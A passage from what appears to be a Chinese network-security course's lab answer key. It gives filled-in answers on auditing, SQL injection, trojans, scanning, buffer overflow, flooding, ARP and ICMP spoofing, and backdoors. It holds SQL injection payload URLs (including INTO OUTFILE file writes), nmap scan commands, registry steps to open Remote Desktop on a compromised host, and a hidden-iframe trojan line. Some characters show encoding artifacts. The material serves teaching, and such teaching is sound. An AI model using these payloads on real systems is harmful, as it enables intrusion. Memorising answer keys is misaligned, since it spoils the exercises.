nèi)容.對比兩次現(xiàn)象,說明采用Apache的AuthConfig模型的作用與其在實際應(yīng)用中的意義:__AuthConfig模型,可以在目錄級別控制訪問權(quán)限,在實際應(yīng)用中可以限制某個目錄需要授權(quán)才能訪問_.二.制作CGI頁面〔1〕修改/var/www/cgi-bin目錄下的first.cgi文件,輸出當(dāng)前機(jī)器的網(wǎng)絡(luò)狀態(tài)〔ifconfig〕,訪問該頁面.修改/var/www/cgi-bin目錄下的"first.cgi〞文件:在該頁面中的<HTML>和</HTML>之間添加"ifconfig〞語句.〔2〕在cgi-bin目錄下創(chuàng)建second.cgi文件,用于顯示"使用者發(fā)出request的遠(yuǎn)端IP地址〞,訪問該頁面.在cgi-bin目錄下創(chuàng)建"second.cgi〞文件:在該頁面中的<HTML>和</HTML>之間添加"echo$REMOTE_ADDR〞語句.三.創(chuàng)建用戶目錄 〔1〕記錄user用戶主目錄的訪問權(quán)限r(nóng)wxr-xr-x. 〔2〕在user用戶主目錄下創(chuàng)建目錄public_html,記下public_html目錄的訪問權(quán)限r(nóng)wxr-xr-x,此目錄上user用戶的文檔主目錄.練習(xí)三日志審計一.Web日志審計2.訪問無權(quán)限和不存在的網(wǎng)頁〔3〕參考實驗原理部分的自定義錯誤類型,這個錯誤代碼代表的錯誤消息是禁止訪問:客戶端的IP地址被拒絕.〔5〕參考實驗原理部分的自定義錯誤類型,這個錯誤代碼代表的錯誤消息是文件或目錄未找到.3.分別自定義日志格式〔2〕舉例說明日志格式:2008-01-0306:14:140.掃面的日期為20XX01月03日.二.FTP日志審計1.匿名登錄FTP服務(wù)器〔2〕操作是否成功?不成功.〔5〕操作是否成功?不成功.〔7〕本機(jī)再次將文件upload.txt上傳至同組主機(jī)FTP服務(wù)器,是否成功?成功.2.用戶登錄FTP服務(wù)器〔2〕登錄都能否成功?最后一次登錄成功.練習(xí)四網(wǎng)絡(luò)事件審計一.概要事件審計〔5〕本機(jī)提供的、FTP、TELNET服務(wù)端口號分別為80、21、23.二.詳細(xì)事件審計1.Web事件審計〔4〕同組主機(jī)在與應(yīng)用服務(wù)器進(jìn)行數(shù)據(jù)通信前,首先發(fā)生的網(wǎng)絡(luò)行為是建立連接.同組主機(jī)所使用的協(xié)議版本/1.1;請求方法是GET.應(yīng)用服務(wù)器使用的Web服務(wù)器類型Apache/.在服務(wù)器的狀態(tài)響應(yīng)中:成功建立后,服務(wù)器首先返回的狀態(tài)碼是200;服務(wù)器返回的內(nèi)容類型是image/jpeg.2.FTP事件審計〔2〕本機(jī)通過NetAudit查看客戶端向服務(wù)器發(fā)送用戶名的命令與參數(shù)是USERanonymous.FTP服務(wù)器的響應(yīng)狀態(tài)代碼是:331.本機(jī)通過NetAudit查看客戶端向服務(wù)器發(fā)送密碼的命令與參數(shù)是PASSIEUser.FTP服務(wù)器的響應(yīng)狀態(tài)代碼是:230.同組主機(jī)在本地創(chuàng)建文本文件a.txt,文件內(nèi)容任意,然后此文件復(fù)制到FTP服務(wù)器上.本機(jī)通過NetAudit查看客戶端向服務(wù)器發(fā)送的命令與參數(shù)是STORa.txt,在文件傳送完成后FTP服務(wù)器的響應(yīng)狀態(tài)代碼是:226.同組主機(jī)將FTP服務(wù)器上的文件a.txt的文件名修改為b.txt.本機(jī)通過NetAudit查看客戶端向服務(wù)器發(fā)送的命令與參數(shù)是RNFRa.txtRNTOb.txt,在文件操作完成后FTP服務(wù)器的響應(yīng)狀態(tài)代碼是:250.同組主機(jī)將FTP服務(wù)器上的文件b.txt復(fù)制到本地.本機(jī)通過NetAudit查看客戶端向服務(wù)器發(fā)送的命令與參數(shù)是RETRb.txt,在文件操作完成后FTP服務(wù)器的響應(yīng)狀態(tài)代碼是:226.同組主機(jī)將FTP服務(wù)器上的文件b.txt刪除.本機(jī)通過NetAudit查看客戶端向服務(wù)器發(fā)送的命令與參數(shù)是DELEb.txt,在文件操作完成后FTP服務(wù)器的響應(yīng)狀態(tài)代碼是:250.3.SMTP事件審計〔3〕發(fā)送方與服務(wù)器的25端口建立連接.連接成功后,服務(wù)器返回響應(yīng)代碼220.發(fā)送方使用命令MAILFROM將發(fā)送方的地址發(fā)送給服務(wù)器.操作成功后服務(wù)器返回響應(yīng)代碼250.發(fā)送方使用命令RCPTTO將接收方的地址發(fā)送給服務(wù)器.操作成功后服務(wù)器返回響應(yīng)代碼250.發(fā)送方使用命令DATA告知服務(wù)器即將開始向服務(wù)器上傳數(shù)據(jù).服務(wù)器返回響應(yīng)代碼354告知發(fā)送方可以開始數(shù)據(jù)的傳輸,傳輸完成后以".〞結(jié)束.在數(shù)據(jù)傳輸成功后,發(fā)送方使用命令QUIT退出與服務(wù)器的連接.服務(wù)器返回響應(yīng)代碼221關(guān)閉連接.4.POP3事件審計〔3〕接收方與服務(wù)器的110端口建立連接.連接成功后服務(wù)器返回狀態(tài)碼+OK表示連接成功.連接成功后接收方使用命令USER和PASS向服務(wù)器發(fā)送用戶名和密碼登錄服務(wù)器.登錄成功后接收方使用命令STAT請求的統(tǒng)計資料.操作成功后服務(wù)器返回狀態(tài)碼和清單+OK數(shù)總字節(jié)數(shù).接收方使用命令RETR請求下載由參數(shù)標(biāo)識的信息.服務(wù)器返回相應(yīng)的狀態(tài)碼和.獲取后接收方使用命令DELE請求在服務(wù)器上刪除已獲取的.操作成功后接收方使用命令QUIT退出與服務(wù)器的連接..實驗15數(shù)據(jù)庫安全練習(xí)一SQL注入一.PHP訪問MySQL簡單實例2.編寫PHP腳本查詢user數(shù)據(jù)庫表寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'ANDpassword='mypass'.3.實施SQL注入〔1〕注入是否成功?不成功.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'or1=1'ANDpassword=''.〔2〕注入是否成功?成功.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'or'1=1'ANDpassword=''.通過分析SQL查詢語句解釋實驗現(xiàn)象:SQL查詢時邏輯AND優(yōu)先邏輯OR.〔3〕注入是否成功?成功.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername='angel'#'ANDpassword=''.〔4〕利用"/*〞實現(xiàn)注入的URL語句:://本機(jī)IP/access.php?username=angel'%2F%2A.SQL查詢語句:SELECT*FROMuserWHEREusername='angel'/*'ANDpassword=''.〔5〕SQL查詢語句:SELECT*FROMuserWHEREusername=''ANDpassword=''or1=1andusername='angel'.URL:://本機(jī)IP/access.php?username=&password='or1=1andusername='angel.〔6〕SQL查詢語句:SELECT*FROMuserWHEREusername=''ANDpassword=''or1=1anduserid='1'.URL:://本機(jī)IP/access.php?username=&password='or1=1anduserid='1.二.搜索引擎注入3.編寫PHP腳本查詢file數(shù)據(jù)庫表輸入關(guān)鍵字"snort〞,進(jìn)行搜索,搜索結(jié)果中含有多少條記錄?3條.記錄中是否包含與snort關(guān)鍵字無關(guān)的項不包含.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMfileWHERETITLELIKE'%snort%'.4.SQL注入〔1〕輸入關(guān)鍵字"%〞,進(jìn)行搜索,搜索結(jié)果中含有多少條記錄?4.記錄中是否包含與snort關(guān)鍵字無關(guān)的項包含honeypotpaper.寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMfileWHERETITLELIKE'%%%'.解釋SQL查詢語句含義:索引TITLE列,模糊查詢?nèi)坑涗?〔2〕寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMfileWHERETITLELIKE'%_'ORDERBYfileid#%'.解釋SQL查詢語句含義:按fileid順序〔由小到大〕,模糊查詢?nèi)坑涗?三.注入實現(xiàn)導(dǎo)出文件基于步驟一,寫出能夠?qū)崿F(xiàn)〔SQL注入〕上述功能的URL:://本機(jī)IP/access.php?username='or1=1intooutfile'/etc/temp.txt'%23寫出此時PHP腳本中具體的SQL查詢語句:SELECT*FROMuserWHEREusername=''or1=1intooutfile'/etc/temp.txt'#'ANDpassword=''.四.通過注入提升用戶權(quán)限〔1〕寫出數(shù)據(jù)表包含的字段名稱:通過輸入describeregister命令,得到數(shù)據(jù)表包含字段名稱為Field、Type、Null、Key、Default、Extra.〔2〕注冊用戶級別〔userlevel〕3.〔3〕單擊"注冊〞按鈕,用戶注冊級別1.寫出此時PHP腳本中具體的SQL查詢語句:INSERTINTOregisterVALUES<0,’jlcss’,’1234’,’’,’1’>#’,3>.實驗16軟件安全練習(xí)一軟件漏洞利用一.Outlook通訊簿中的安全隱患2.驗證通訊薄備份的自動恢復(fù)功能〔1〕主機(jī)A運行"host1A.WAB〞,打開Outlook通訊薄,可以在"主標(biāo)識的聯(lián)系人〞中查看聯(lián)系人信息:##host1A,電子地址host1ACServer.NetLab.關(guān)閉Outlook通訊薄,可以發(fā)現(xiàn)在桌面生成"host1A.WAB~〞,此文件即為"host1A.WAB〞的備份文件.〔3〕主機(jī)A再次運行"host1A.WAB〞文件,提示如下信息:查看通訊薄中聯(lián)系人信息:##host1A,電子地址host1ACServer.NetLab.3.通訊薄備份的自動恢復(fù)功能漏洞利用〔3〕主機(jī)A再次將文件"host1A.WAB〞中數(shù)據(jù)破壞,恢復(fù)后查看通訊薄,可以觀察到通訊薄"host1A.WAB〞中聯(lián)系人信息已經(jīng)被篡改,其中聯(lián)系人信息為:##jlcss,電子地址jlcssCServer.NetLab.二.利用迅雷漏洞植入木馬1.生成網(wǎng)頁木馬〔4〕訪問網(wǎng)頁木馬主機(jī)A查看"灰鴿子遠(yuǎn)程控制〞程序主界面的"文件管理器〞屬性頁中"文件目錄瀏覽〞樹,是否出現(xiàn)上線主機(jī)否?2.木馬的植入〔3〕主機(jī)A查看"灰鴿子遠(yuǎn)程控制〞程序主界面的"文件管理器〞屬性頁中"文件目錄瀏覽〞樹,此時是否出現(xiàn)上線主機(jī)是?3.迅雷網(wǎng)頁木馬的防御方法〔3〕主機(jī)A查看"灰鴿子遠(yuǎn)程控制〞程序主界面的"文件管理器〞屬性頁中"文件目錄瀏覽〞樹,此時是否出現(xiàn)上線主機(jī)否?實驗17協(xié)議脆弱性分析練習(xí)一SNMP協(xié)議脆弱性分析一.SNMP協(xié)議脆弱性分析2.主機(jī)B進(jìn)行SNMP掃描與網(wǎng)絡(luò)嗅探〔1〕查看默認(rèn)共同體類型為public〔2〕名稱返回結(jié)果sysDescrLinuxExpNIS.Netlab2.6.15-1.2054_FC5#1TueMar1415:48:33EST2006i686sysNameExpNIS.NetlabipDefaultTTL643.主機(jī)C使用SNMP工具修改主機(jī)A節(jié)點值〔2〕雙擊獲得該值信息ExpNIS.Netlab4.主機(jī)B分析捕獲數(shù)據(jù)包〔1〕記錄SNMP共同體為:jlcss〔2〕截獲內(nèi)容為:changedbymanager二.SNMP協(xié)議脆弱性利用2.根據(jù)DATA區(qū)的數(shù)據(jù)內(nèi)容恢復(fù)文件〔1〕獲得主機(jī)名ExpNIS.Netlab〔2〕是否被更新是.〔3〕 通知主機(jī)C查看sysName節(jié)點值是否被更新是..實驗18安全協(xié)議練習(xí)一IPSec-IP安全協(xié)議二.IPsec虛擬專用網(wǎng)絡(luò)的檢測〔1〕填寫ping操作反饋信息:正常.〔2〕填寫ping操作反饋信息:NegotiatingIPSecurity.〔3〕填寫ping操作反饋信息:Requesttimedout.〔4〕填寫ping操作反饋信息:正常.三.協(xié)議分析ESP〔4〕ESP協(xié)議類型值50.安全參數(shù)索引<SPI>值是421F0A9〔隨機(jī)值〕序列號是4.ICMP負(fù)載是否被加密封裝是.四.協(xié)議分析AH〔8〕AH協(xié)議類型值〔十進(jìn)制〕51.下一個報頭所標(biāo)識的協(xié)議類型是ICMP.載荷長度值是4.由該值計算出AH報頭總長度是:24,具體計算方法:載荷長度值加2后乘以4.安全參數(shù)索引值是8B280016〔隨機(jī)值〕.ICMP負(fù)載是否被加密封裝沒有.練習(xí)二SSL-安全套接層協(xié)議一.使用Apache+OpenSSL組合實現(xiàn)安全通信1.CA簽發(fā)客戶端證書〔1〕OpenSSL命令:req-newkeyrsa:1024-keyoutclient.key-outclient.pem-days365-passoutpass:jlcsspkicli-configopensslf〔2〕OpenSSL命令:ca-inclient.pem-passinpass:jlcsspkica-batch-outclient.crt-keyfileca.key-certca.crt-configopensslf〔3〕OpenSSL命令:pkcs12-export-inclient.crt-inkeyclient.key-passinpass:jlcsspkicli-passoutpass:clientpkcs12-outcli_pkcs12.pfx.實驗19信息搜集練習(xí)一信息搜集一.信息搜集1.ping探測主機(jī)A回復(fù)數(shù)據(jù)包的TTL值:128;操作系統(tǒng)可能為:WindowsNT/2K/XP/2003.主機(jī)B回復(fù)數(shù)據(jù)包的TTL值:64;操作系統(tǒng)可能為:Linux.2.Nmap掃描〔1〕Nmap命令〔TCP端口掃描〕:nmap-sS-T5目標(biāo)IP;探測到主機(jī)A開放的TCP端口有:2180135139;主機(jī)B開放的TCP端口:212380.Nmap命令〔UDP端口掃描〕:nmap-sU目標(biāo)IP;探測到主機(jī)A開放的UDP端口:123137138;主機(jī)B開放的UDP端口:111.〔2〕Nmap命令:nmap-T5-O目標(biāo)IP.查看掃描結(jié)果:主機(jī)A為Running<JUSTGUESSING>:MicrosoftWindowsXP|2000|2003<95%>;主機(jī)B為:Running:Linux〔3〕主機(jī)A、B提供Web服務(wù)使用的軟件類型分別為:Microsoft-IIS/6.0和Apache/<Fedora>.主機(jī)A、B提供FTP服務(wù)使用的軟件類型分別為:MicrosoftFTPservice和VSFTPd.〔4〕Nmap命令:nmap-T5-sO目標(biāo)IP--dns_server.練習(xí)二主機(jī)發(fā)現(xiàn)任務(wù)一ARP主機(jī)發(fā)現(xiàn)二.主機(jī)發(fā)現(xiàn)程序開發(fā)源碼答案:參見應(yīng)用服務(wù)器中源碼答案19-2-1.練習(xí)三端口掃描任務(wù)一TCP端口掃描源碼答案:參見應(yīng)用服務(wù)器中源碼答案19-3-1任務(wù)二UDP端口掃描〔9〕詳細(xì)說明UDP端口掃描原理:掃描主機(jī)向目標(biāo)端口發(fā)送數(shù)據(jù)包,如果目標(biāo)主機(jī)返回ICMP端口不可達(dá)數(shù)據(jù)包,則表明該端口是關(guān)閉的,否則就是開啟的.源碼答案:參見應(yīng)用服務(wù)器中源碼答案19-3-2..實驗20漏洞掃描練習(xí)二模擬攻擊方法一.初步掃描〔2〕主機(jī)A分析掃描結(jié)果,從掃描結(jié)果中可以了解到主機(jī)B開放了21、23、80、135、139、445、1025、1027端口,使用的是Windows2003操作系統(tǒng),確定具有攻擊價值.二.進(jìn)一步掃描〔2〕賬戶類型為管理員〔Administrator〕密碼為1234.三.開啟遠(yuǎn)程桌面服務(wù)3.通過修改注冊表開啟主機(jī)B遠(yuǎn)程桌面:主機(jī)A登錄成功后在命令提示符下執(zhí)行"regquery"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer"〞查看執(zhí)行結(jié)果,fDenyTSConnections的值為0x1.主機(jī)A確定修改是否成功,在命令提示符下再次執(zhí)行regquery"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer命令,查看"fDenyTSConnections〞的值,"fDenyTSConnections〞的值為0x0.主機(jī)A再次使用遠(yuǎn)程桌面連接主機(jī)B,連接是否成功是〔是/否〕.練習(xí)三Web漏洞掃描器源碼答案:參見應(yīng)用服務(wù)器中源碼答案20-3..實驗21網(wǎng)絡(luò)嗅探練習(xí)二原始套接字嗅探器源碼答案:參見應(yīng)用服務(wù)器中源碼答案21-2.練習(xí)三Winpcap嗅探器源碼答案:參見應(yīng)用服務(wù)器中源碼答案21-3..實驗22緩沖區(qū)溢出練習(xí)一緩沖區(qū)溢出攻擊二.利用ms08025漏洞進(jìn)行攻擊2.使用系統(tǒng)命令添加用戶請解釋出現(xiàn)上述現(xiàn)象的原因:當(dāng)前用戶為普通用戶,普通用戶沒有添加用戶的權(quán)限.練習(xí)二本地緩沖區(qū)溢出任務(wù)一利用跳轉(zhuǎn)指令實現(xiàn)緩沖區(qū)溢出二.溢出實現(xiàn)3.生成實現(xiàn)彈出對話框的指令碼〔3〕所以我們需要在匯編代碼中正確設(shè)置堆棧并調(diào)用MessageBoxA函數(shù)的絕對內(nèi)存地址,該地址為0x77E4D8DE.函數(shù)ExitProcess的絕對內(nèi)存地址0x7C813039.源碼答案:參見應(yīng)用服務(wù)器中源碼答案22-2-1.任務(wù)二定位參數(shù)地址實現(xiàn)緩沖區(qū)溢出二.溢出實現(xiàn)6.回答問題〔1〕OverFlowServer.exe程序中,shellcode函數(shù)入口偏移地址0x1020與函數(shù)體大小0x197<字節(jié)>.〔2〕OverFlowServer.exe程序中,在OverFlow調(diào)用前ebp基地址0x0012FF80和調(diào)用返回時的指令地址0x0040110A.〔3〕OverFlowServer.exe程序中,TempBuffer緩沖區(qū)內(nèi)存地址0x0012F968與其大小432<字節(jié)>.源碼答案:參見應(yīng)用服務(wù)器中源碼答案22-2-2.任務(wù)三緩沖區(qū)溢出實現(xiàn)用戶權(quán)限提升3.提升權(quán)限〔1〕輸入命令:whoami,當(dāng)前登錄的用戶是guest.〔2〕輸入命令:cat/etc/shadow,嘗試查看陰影文件,此時系統(tǒng)提示cat:/etc/shadow權(quán)限不夠.上述情況證實root用戶有對陰影文件的訪問權(quán),其它任何用戶均無此權(quán)限.〔3〕輸入命令:passwdroot,嘗試修改root用戶登錄口令,此時系統(tǒng)提示passwd:Onlyrootcanspecifyausername.練習(xí)三遠(yuǎn)程溢出與后門植入二.遠(yuǎn)程溢出實現(xiàn)〔可選〕源碼答案:參見應(yīng)用服務(wù)器中源碼答案22-3..實驗23拒絕服務(wù)攻擊練習(xí)一洪泛攻擊一.SYN洪水攻擊3.洪水攻擊〔5〕靶機(jī)為什么會消耗大量的系統(tǒng)資源:問題就出在TCP連接的三次握手中,假設(shè)一個用戶向服務(wù)器發(fā)送了SYN報文后突然死機(jī)或掉線,那么服務(wù)器在發(fā)出SYN+ACK應(yīng)答報文后是無法收到客戶端的ACK報文的〔第三次握手無法完成〕,這種情況下服務(wù)器端一般會重試〔再次發(fā)送SYN+ACK給客戶端〕并等待一段時間后丟棄這個未完成的連接,這段時間的長度我們稱為SYNTimeout,一般來說這個時間是分鐘的數(shù)量級〔大約為30秒-2分鐘〕;一個用戶出現(xiàn)異常導(dǎo)致服務(wù)器的一個線程等待1分鐘并不是什么很大的問題,但如果有一個惡意的攻擊者大量模擬這種情況,服務(wù)器端將為了維護(hù)一個非常大的半連接列表而消耗非常多的資源.實際上如果服務(wù)器的TCP/IP棧不夠強(qiáng)大,最后的結(jié)果往往是堆棧溢出崩潰——即使服務(wù)器端的系統(tǒng)足夠強(qiáng)大,服務(wù)器端也將忙于處理攻擊者偽造的TCP連接請求而無暇理睬客戶的正常請求〔畢竟客戶端的正常請求比率非常之小〕,此時從正常客戶的角度看來,服務(wù)器失去響應(yīng),這種情況我們稱作:服務(wù)器端受到了SYNFlood攻擊〔SYN洪水攻擊〕.練習(xí)三Smurf攻擊二.Smurf攻擊1.攻擊實現(xiàn)〔3〕主機(jī)A是否與主機(jī)B進(jìn)行過ICMP通信:否.表23-3-1源IP源MACIP/MAC地址對是否匹配主機(jī)CIP主機(jī)CMAC匹配主機(jī)DIP主機(jī)DMAC匹配主機(jī)EIP主機(jī)EMAC匹配主機(jī)FIP主機(jī)FMAC匹配〔4〕表23-3-2實驗主機(jī)源IP源MACIP/MAC地址對是否匹配主機(jī)C主機(jī)BIP主機(jī)AMAC不匹配主機(jī)D主機(jī)BIP主機(jī)AMAC不匹配主機(jī)E主機(jī)BIP主機(jī)AMAC不匹配主機(jī)F主機(jī)BIP主機(jī)AMAC不匹配2.構(gòu)造數(shù)據(jù)〔1〕表23-3-3目的MAC源MAC源IP目的IP協(xié)議類型類型/代碼KmacHmacTipKipICMP8/0〔2〕表23-3-4目的MAC源MAC源IP目的IP協(xié)議類型類型/代碼TmacKmacKipTipICMP0/0.實驗24欺騙攻擊練習(xí)一ARP欺騙一.ARP欺騙攻擊1.正常通信〔4〕是否監(jiān)聽到目標(biāo)主機(jī)間的通信數(shù)據(jù):不能.目標(biāo)主機(jī)不在同一個共享設(shè)備上,正常狀態(tài)下目標(biāo)主機(jī)一和二間的通信,黑客主機(jī)監(jiān)聽不到它們之間的信息.2.ARP攻擊〔3〕目標(biāo)主機(jī)二是否接收到數(shù)據(jù):否目標(biāo)主機(jī)間的通信是否正常:不正常是否監(jiān)聽到目標(biāo)主機(jī)間的通信數(shù)據(jù):是目標(biāo)主機(jī)一發(fā)送給目標(biāo)主機(jī)二的數(shù)據(jù)包,其目的MAC是黑客主機(jī)的MAC地址.〔4〕是否正常:不正常目標(biāo)主機(jī)一的ARP緩存表中與目標(biāo)主機(jī)二IP相映射的MAC地址已更新為黑客主機(jī)的MAC地址.3.單向欺騙〔4〕目標(biāo)主機(jī)二是否接收到數(shù)據(jù):收到黑客主機(jī)將接收到的源IP為目標(biāo)主機(jī)一、目的IP為目標(biāo)主機(jī)二的數(shù)據(jù)包重新轉(zhuǎn)發(fā)給目標(biāo)主機(jī)二.〔9〕是否能夠ping通:能數(shù)據(jù)包在網(wǎng)絡(luò)中的傳輸路徑:目標(biāo)主機(jī)一→黑客主機(jī)→目標(biāo)主機(jī)二.〔10〕是否監(jiān)聽到主機(jī)一給主機(jī)二發(fā)出的ICMP回顯請求數(shù)據(jù)包:是是否監(jiān)聽到主機(jī)二給主機(jī)一發(fā)出的ICMP回顯應(yīng)答數(shù)據(jù)包:否目標(biāo)主機(jī)二的ARP緩沖表中與目標(biāo)主機(jī)一IP相映射的MAC地址仍然是目標(biāo)主機(jī)一的MAC地址.所以目標(biāo)主機(jī)二會將ICMP回顯應(yīng)答數(shù)據(jù)包直接發(fā)送給目標(biāo)主機(jī)一.二.防XARP欺騙1.清空ARP緩存表清空ARP緩存表命令:arp-d.2.IP/MAC地址綁定<2>腳本文件:echooffarp-darp-s5200-0c-29-95-b5-e9exit練習(xí)二ICMP重定向二.ICMP重定向攻擊〔2〕主機(jī)A使用ping命令測試和主機(jī)F之間網(wǎng)絡(luò)的連接情況.主機(jī)A、F對所捕獲的數(shù)據(jù)包進(jìn)行分析,完成下表.實驗主機(jī)ICMP報文類型源IP目的IP源MAC目的MAC主機(jī)A請求主機(jī)A主機(jī)F主機(jī)A主機(jī)Eeth0回顯主機(jī)F主機(jī)A主機(jī)Eeth0主機(jī)A主機(jī)F請求主機(jī)A主機(jī)F主機(jī)A主機(jī)Eeth0請求主機(jī)A主機(jī)F主機(jī)Eeth1主機(jī)F回顯主機(jī)F主機(jī)A主機(jī)F主機(jī)Eeth1回顯主機(jī)F主機(jī)A主機(jī)Eeth0主機(jī)A仔細(xì)觀察主機(jī)F捕獲到的數(shù)據(jù)包,這些ICMP數(shù)據(jù)包是否成對出現(xiàn)?是,若是,那么每對中的數(shù)據(jù)包都是相同的嗎?不是,如果不同,它們有什么區(qū)別?MAC地址是不同的,為什么會出現(xiàn)這樣的結(jié)果:因為主機(jī)E、F在同一共享模塊下,主機(jī)F可以捕獲到主機(jī)E與主機(jī)A通信的數(shù)據(jù)包.〔3〕確認(rèn)連通后,主機(jī)A、F分別使用路由跟蹤查看通信時所經(jīng)過的網(wǎng)關(guān),命令:tracert主機(jī)FIP,tracert主機(jī)AIP,網(wǎng)關(guān)IP:主機(jī)EIP.〔4〕主機(jī)A、F分別使用ping命令探測各自網(wǎng)關(guān),然后查看ARP緩存表,使用命令:arp-a,可以得出各自網(wǎng)關(guān)MAC地址:主機(jī)EMAC.〔6〕主機(jī)A刷新協(xié)議分析器,查看主機(jī)B發(fā)給主機(jī)A的ICMP重定向數(shù)據(jù)包,類型:5,代碼:1,網(wǎng)關(guān)地址:虛假IP,有效載荷數(shù)據(jù)的長度:28.〔7〕主機(jī)A再次清空協(xié)議分析器,使用ping命令向主機(jī)F發(fā)出ICMP回顯請求,此時能否得到回復(fù)?否.為什么?因為主機(jī)A與主機(jī)F之間的路由被串改成了虛假IP,主機(jī)A與主機(jī)F通信時,數(shù)據(jù)包發(fā)給了虛假IP地址,此時主機(jī)F沒有收到ICMP請求數(shù)據(jù)包.〔8〕主機(jī)A使用路由跟蹤命令探測與主機(jī)F之間的路由.結(jié)果:超時.〔9〕主機(jī)A查看本機(jī)路由表,命令:routeprint,可以發(fā)現(xiàn)多了一條路由表項:主機(jī)A到主機(jī)F的路由信息.三.ICMP重定向欺騙攻擊〔5〕主機(jī)A使用ping命令向主機(jī)F發(fā)出ICMP回顯請求,對所捕獲的數(shù)據(jù)包再次分析,根據(jù)主機(jī)A、F,主機(jī)B、F間通信的數(shù)據(jù)包完成下表:實驗主機(jī)ICMP報文類型源IP目的IP源MAC目的MAC主機(jī)A請求主機(jī)A主機(jī)F主機(jī)A主機(jī)Beth0回顯主機(jī)F主機(jī)A主機(jī)Beth0主機(jī)A請求主機(jī)Beth1主機(jī)F主機(jī)Beth1主機(jī)F回顯主機(jī)F主機(jī)Beth1主機(jī)F主機(jī)Beth1主機(jī)F請求主機(jī)Beth1主機(jī)F主機(jī)Beth1主機(jī)F回顯主機(jī)F主機(jī)Beth1主機(jī)F主機(jī)Beth1〔6〕主機(jī)A、F分別使用路由跟蹤命令探測其間的路由.結(jié)果:主機(jī)A經(jīng)過網(wǎng)關(guān)主機(jī)B,主機(jī)F經(jīng)過網(wǎng)關(guān)主機(jī)E.為什么會出現(xiàn)這樣的結(jié)果,寫出原因:主機(jī)B對主機(jī)A進(jìn)行了ICMP重定向欺騙攻擊,但并沒有對主機(jī)F進(jìn)行攻擊.〔7〕主機(jī)A查看本機(jī)路由表,可以發(fā)現(xiàn)到主機(jī)F的路由表項:網(wǎng)關(guān)是主機(jī)B.四.ICMP重定向欺騙攻擊的防X〔3〕主機(jī)A查看本機(jī)路由表,是否發(fā)現(xiàn)新的路由表項沒有,協(xié)議分析器是否捕獲到ICMP重定向數(shù)據(jù)包是..實驗25網(wǎng)絡(luò)后門練習(xí)一shell后門二.遠(yuǎn)程控制工具JlcssShell<1>端口21581是否開啟:開啟.練習(xí)二無端口后門二.ICMP后門實現(xiàn)4.后門通信分析<1>協(xié)議類型是:ARP通過該協(xié)議可以達(dá)到什么目標(biāo):獲取目標(biāo)主機(jī)MAC地址<2>IP上層協(xié)議類型是:ICMP上層協(xié)議負(fù)載長度:10IP上層協(xié)議負(fù)載的最后6個字節(jié):search<3>響應(yīng)數(shù)據(jù)內(nèi)容:TheBackDoorOK!IP上層協(xié)議類型是:ICMP<4>后門客戶程序發(fā)出枚舉受害主機(jī)運行進(jìn)程的命令是:pslist<5>運行貪吃蛇程序后系統(tǒng)監(jiān)聽端口無變化.三.ICMP后門原理2.后門客戶程序〔1〕WSAStartup...MAKEWORD<2,1>調(diào)用WSAStartup函數(shù)加載Winsock庫,版本2.1.〔2〕WSASocket...IPPROTO_ICMP調(diào)用WSASocket函數(shù)創(chuàng)建原始套接字,應(yīng)用協(xié)議為ICMP〔3〕setsockopt...SO_SNDTIMEO調(diào)用setsockopt設(shè)置套接字發(fā)送超時.〔4〕setsockopt...SO_RCVTIMEO調(diào)用setsockopt設(shè)置套接字接收超時.〔5〕constructdata通過pslist、pskillID來構(gòu)造數(shù)據(jù)..實驗26特洛伊木馬練習(xí)一網(wǎng)頁木馬一.木馬的生成與植入3.木馬的植入Hacker.ini文件是由哪個進(jìn)程創(chuàng)建的:winlogoin.exe;WindowsXPvista服務(wù)的執(zhí)行體文件是:Hacker.ini;8000服務(wù)遠(yuǎn)程地址〔控制端〕地址:主機(jī)A的IP地址;在"進(jìn)程監(jiān)控〞中出現(xiàn)的winlogoin.exe進(jìn)程〔若存在〕在整個的木馬植入過程中起到的作用是:木馬服務(wù)器端安裝程序;練習(xí)二Webshell一.Webshell木馬2.

使用現(xiàn)有木馬控制web服務(wù)器〔3〕一開始程序先用CreateObject方法建立了一個wscript.shell控件的對象ws,然后用cmdStr存儲想要執(zhí)行的命令字符串,利用創(chuàng)建的對象調(diào)用exec函數(shù)執(zhí)行cmdStr中的命令.二.通過權(quán)限控制防X該類木馬〔5〕主機(jī)B在瀏覽器中輸入://主機(jī)A的IP:9090/shell.asp地址,查看修改后的訪問效果,效果為:無權(quán)限訪問shell.asp.〔6〕主機(jī)B再次訪問主機(jī)A"木馬2〞下的木馬文件asptroy.asp,進(jìn)入"Wscript.shell〞頁面的效果為:拒絕訪問asptroy.asp.練習(xí)三ARP木馬與ARP防火墻三.驗證實現(xiàn)現(xiàn)象1.主機(jī)A開始"掛馬〞〔4〕查看灰鴿子序主界面"文件管理器〞|"文件目錄瀏覽〞|"自動上線主機(jī)〞是否出現(xiàn)上線主機(jī)是.2.主機(jī)B分析木馬被植入過程〔1〕打開IE瀏覽器,在任務(wù)欄上單擊鼠標(biāo)右鍵,選擇"任務(wù)管理器〞,找到名為"IEXPLORE.EXE〞的進(jìn)程,其用戶名為Administrator.〔2〕在IE瀏覽器地址欄中輸入"://主機(jī)F的IP地址〞,訪問主機(jī)F的WEB服務(wù),訪問能否成功能?在打開的網(wǎng)頁中點擊右鍵,選擇"查看源文件〔V〕〞查看源文件內(nèi)容,發(fā)現(xiàn)源文件頭部有一條iframe語句:其內(nèi)容為<iframesrc='網(wǎng)馬地址'width=0height=0></iframe>.〔3〕查看"任務(wù)管理器〞,是否又出現(xiàn)一個名為"IEXPLORE.EXE〞的進(jìn)程,其用戶名為SYSTEM.〔4〕在命令行下輸入命令"netstat-an〞,查看主機(jī)端口連接,連接8000端口的遠(yuǎn)程地址是:主機(jī)A的IP.〔6〕表26-3-1主機(jī)B的會話過程表會話源MAC地址目的MAC地址源IP目的IP第一個GET主機(jī)B的MAC地址主機(jī)A的MAC地址主機(jī)B的IP外網(wǎng)IP第二個GET主機(jī)A的MAC地址主機(jī)E的內(nèi)網(wǎ